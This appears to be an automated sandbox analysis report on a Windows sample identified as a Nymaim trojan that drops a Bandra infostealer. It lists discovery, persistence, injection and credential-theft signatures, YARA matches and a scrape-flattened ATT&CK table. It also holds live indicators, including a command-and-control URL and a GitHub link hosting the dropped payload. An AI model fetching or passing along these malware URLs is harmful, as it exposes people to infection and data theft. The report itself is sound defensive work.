                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413453 cpuid 13_2_00413453
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413871 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_00413871
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004219A1 _free,_free,_free,GetTimeZoneInformation,_free,13_2_004219A1
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0040F200 Sleep,IsUserAnAdmin,GetUserNameW,GetComputerNameExW,13_2_0040F200
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,13_2_00405230
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.37e2e08.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.0XzeMRyE1e.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.3893460.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.3832e28.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.0XzeMRyE1e.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.3832e28.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.37bade8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.37e2e08.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.0XzeMRyE1e.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.386b440.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.3893460.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.38e3480.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.0XzeMRyE1e.exe.37bade8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.16.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.386b440.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.16.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.0XzeMRyE1e.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.0XzeMRyE1e.exe.400000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0XzeMRyE1e.exe.38e3480.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.0XzeMRyE1e.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.410768530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.304714151.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.304438812.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.428611473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.427877581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.426514093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.297012501.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.297993212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.297659773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000000.298902181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6756, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6624, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: file_22613.exe PID: 6756, type: MEMORYSTR
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1
                        Windows Management Instrumentation
                        121
                        Registry Run Keys / Startup Folder
                        1
                        Exploitation for Privilege Escalation
                        1
                        Disable or Modify Tools
                        OS Credential Dumping2
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium2
                        Ingress Tool Transfer
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts22
                        Native API
                        Boot or Logon Initialization Scripts211
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol1
                        Screen Capture
                        Exfiltration Over Bluetooth21
                        Encrypted Channel
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)121
                        Registry Run Keys / Startup Folder
                        4
                        Obfuscated Files or Information
                        Security Account Manager3
                        File and Directory Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                        Software Packing
                        NTDS45
                        System Information Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer14
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Masquerading
                        LSA Secrets1
                        Query Registry
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common31
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials251
                        Security Software Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items211
                        Process Injection
                        DCSync31
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                        Process Discovery
                        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                        Remote System Discovery
                        Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 637914 Sample: 0XzeMRyE1e.exe Startdate: 02/06/2022 Architecture: WINDOWS Score: 100 44 mastodon.online 2->44 60 Snort IDS alert for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 9 other signatures 2->66 8 0XzeMRyE1e.exe 15 4 2->8         started        13 0XzeMRyE1e.exe 2 2->13         started        15 file_22613.exe 2->15         started        17 file_22613.exe 2->17         started        signatures3 process4 dnsIp5 52 north.ac 172.67.152.230, 443, 49758, 49759 CLOUDFLARENETUS United States 8->52 42 C:\Users\user\AppData\...\0XzeMRyE1e.exe.log, ASCII 8->42 dropped 70 Found stalling execution ending in API Sleep call 8->70 72 Contains functionality to inject code into remote processes 8->72 74 Injects a PE file into a foreign processes 8->74 19 0XzeMRyE1e.exe 1 17 8->19         started        23 cmd.exe 3 8->23         started        54 104.21.2.205, 49781, 80 CLOUDFLARENETUS United States 13->54 26 0XzeMRyE1e.exe 13->26         started        file6 signatures7 process8 dnsIp9 46 sigint.ws 80.66.64.103, 49764, 49783, 49784 VAD-SRL-AS1MD Russian Federation 19->46 48 github.com 140.82.121.3, 443, 49765, 49766 GITHUBUS United States 19->48 50 2 other IPs or domains 19->50 34 C:\Users\user\AppData\...\file_22613.exe, PE32 19->34 dropped 36 C:\Users\user\AppData\...\file_22613[1].exe, PE32 19->36 dropped 28 file_22613.exe 12 19->28         started        38 C:\Users\user\AppData\...\0XzeMRyE1e.exe, PE32 23->38 dropped 40 C:\Users\...\0XzeMRyE1e.exe:Zone.Identifier, ASCII 23->40 dropped 68 Drops PE files to the startup folder 23->68 32 conhost.exe 23->32         started        file10 signatures11 process12 dnsIp13 56 t.me 149.154.167.99, 443, 49893 TELEGRAMRU United Kingdom 28->56 58 94.130.174.62, 80 HETZNER-ASDE Germany 28->58 76 Multi AV Scanner detection for dropped file 28->76 78 Found evasive API chain (may stop execution after checking mutex) 28->78 80 Machine Learning detection for dropped file 28->80 82 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 28->82 signatures14

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        0XzeMRyE1e.exe36%VirustotalBrowse
                        0XzeMRyE1e.exe14%MetadefenderBrowse
                        0XzeMRyE1e.exe65%ReversingLabsByteCode-MSIL.Trojan.Nymaim
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe20%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exe65%ReversingLabsWin32.Infostealer.Bandra
                        C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe20%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe65%ReversingLabsWin32.Infostealer.Bandra
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe14%MetadefenderBrowse
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe65%ReversingLabsByteCode-MSIL.Trojan.Nymaim
                        SourceDetectionScannerLabelLinkDownload
                        13.2.0XzeMRyE1e.exe.400000.0.unpack100%AviraHEUR/AGEN.1237910Download File
                        13.0.0XzeMRyE1e.exe.400000.14.unpack100%AviraHEUR/AGEN.1237910Download File
                        13.0.0XzeMRyE1e.exe.400000.6.unpack100%AviraHEUR/AGEN.1237910Download File
                        21.0.0XzeMRyE1e.exe.400000.4.unpack100%AviraHEUR/AGEN.1237910Download File
                        13.0.0XzeMRyE1e.exe.400000.4.unpack100%AviraHEUR/AGEN.1237910Download File
                        17.0.file_22613.exe.c60000.0.unpack100%AviraHEUR/AGEN.1224094Download File
                        13.0.0XzeMRyE1e.exe.400000.12.unpack100%AviraHEUR/AGEN.1237910Download File
                        18.2.file_22613.exe.c60000.0.unpack100%AviraHEUR/AGEN.1224094Download File
                        21.0.0XzeMRyE1e.exe.400000.6.unpack100%AviraHEUR/AGEN.1237910Download File
                        21.0.0XzeMRyE1e.exe.400000.14.unpack100%AviraHEUR/AGEN.1237910Download File
                        13.0.0XzeMRyE1e.exe.400000.16.unpack100%AviraHEUR/AGEN.1237910Download File
                        20.0.file_22613.exe.c60000.0.unpack100%AviraHEUR/AGEN.1224094Download File
                        21.0.0XzeMRyE1e.exe.400000.10.unpack100%AviraHEUR/AGEN.1237910Download File
                        18.0.file_22613.exe.c60000.0.unpack100%AviraHEUR/AGEN.1224094Download File
                        13.0.0XzeMRyE1e.exe.400000.8.unpack100%AviraHEUR/AGEN.1237910Download File
                        17.2.file_22613.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        17.3.file_22613.exe.d5d0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                        13.0.0XzeMRyE1e.exe.400000.10.unpack100%AviraHEUR/AGEN.1237910Download File
                        21.0.0XzeMRyE1e.exe.400000.16.unpack100%AviraHEUR/AGEN.1237910Download File
                        21.2.0XzeMRyE1e.exe.400000.0.unpack100%AviraHEUR/AGEN.1237910Download File
                        21.0.0XzeMRyE1e.exe.400000.12.unpack100%AviraHEUR/AGEN.1237910Download File
                        20.2.file_22613.exe.c60000.0.unpack100%AviraHEUR/AGEN.1224094Download File
                        18.2.file_22613.exe.f840000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        17.2.file_22613.exe.14a3460.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        17.2.file_22613.exe.c60000.1.unpack100%AviraHEUR/AGEN.1224094Download File
                        21.0.0XzeMRyE1e.exe.400000.8.unpack100%AviraHEUR/AGEN.1237910Download File
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        https://north.ac40%Avira URL Cloudsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://fontfabrik.com0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://94.130.174.62/n0%Avira URL Cloudsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://sigint.ws/f8dfksdj3/index.php2%VirustotalBrowse
                        http://sigint.ws/f8dfksdj3/index.php100%Avira URL Cloudmalware
                        http://94.130.174.62/g0%Avira URL Cloudsafe
                        https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exe0%Avira URL Cloudsafe
                        http://sigint.ws/f8dfksdj3/index.php2100%Avira URL Cloudmalware
                        http://www.microsoft.0%URL Reputationsafe
                        http://sigint.ws/f8dfksdj3/index.phpD%100%Avira URL Cloudmalware
                        http://www.carterandcone.coml0%URL Reputationsafe
                        https://north.ac/7600%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        https://mastodon.online/0%Avira URL Cloudsafe
                        http://north.ac/7600%Avira URL Cloudsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        sigint.ws/f8dfksdj3/index.php100%Avira URL Cloudmalware
                        http://94.130.174.62/10%Avira URL Cloudsafe
                        http://94.130.174.62/0%Avira URL Cloudsafe
                        http://north.ac0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        github.com
                        140.82.121.3
                        truefalse
                          high
                          sigint.ws
                          80.66.64.103
                          truefalse
                            high
                            raw.githubusercontent.com
                            185.199.108.133
                            truefalse
                              high
                              t.me
                              149.154.167.99
                              truefalse
                                high
                                mastodon.online
                                95.216.4.252
                                truefalse
                                  high
                                  north.ac
                                  172.67.152.230
                                  truefalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://github.com/neiqops/ajajaj/raw/main/file_22613.exefalse
